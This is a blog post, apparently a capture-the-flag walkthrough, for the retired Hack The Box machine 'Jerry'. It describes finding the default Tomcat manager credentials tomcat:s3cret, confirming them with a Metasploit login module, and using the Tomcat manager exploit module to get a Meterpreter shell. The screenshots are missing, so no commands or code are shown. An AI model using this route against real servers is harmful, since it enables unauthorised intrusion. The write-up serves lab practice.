Thursday, March 21, 2019

Jerry


JERRY

- Layout for this exercise:





1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Jerry, what is a retired machine from the Hack The Box pentesting platform:

https://www.hackthebox.eu


2 - ENUMERATION

Jerry's IP is 10.10.10.95:




- Scanning with Nmap, there is only one open port 8080:




- Scanning deeper:




- So we have a web server running Apache-Coyote Tomcat 7.0.88 JSP engine 1.1 at port 8080.

- Connecting with the browser:





- Clicking any tab the user is prompted with a login form:





- However, when clicking Cancel the answer is a 401 Unauthorized error web page that reveals credentials information like tomcat:s3cret





3 - EXPLOITATION


- Another way to find valid credentials would be to use Metasploit's auxiliary module tomcat_mgr_login:




- Setting options:





- Running the module after a while finally same credentials than before are found:


.......................




Metasploit provides a module to exploit an Apache Tomcat server with an exposed "manager" application vulnerability :




- Using this module:





- Setting options (using exposed credentials tomcat:s3cret) and running the exploit we get a Meterpreter session:






- Spawning a shell:




4 - CAPTURING THE FLAGS

- In this case both flags are in the same text file: